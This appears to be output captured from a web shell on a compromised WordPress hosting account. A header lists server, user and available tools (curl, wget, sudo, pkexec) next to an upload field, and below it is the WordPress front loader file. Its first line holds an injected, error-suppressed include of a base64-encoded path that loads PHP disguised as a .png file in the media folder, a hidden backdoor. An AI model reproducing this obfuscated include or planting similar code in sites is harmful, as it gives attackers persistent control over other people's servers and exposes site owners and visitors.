| Server IP : 103.73.189.18 / Your IP : 216.73.217.70 Web Server : Apache System : Linux ind1.webspacekit.com 4.18.0-553.137.1.lve.el8.x86_64 #1 SMP Tue Jun 23 21:01:50 UTC 2026 x86_64 User : sarahwil ( 1617) PHP Version : 8.1.34 Disable Function : mail MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/sarahwil/public_html/ |
Upload File : |
<?php @include base64_decode("L2hvbWUvc2FyYWh3aWwvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvaW1hZ2VzL21lZGlhL2FhYWNiY2VhYmNkYmJhLnBuZw==");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}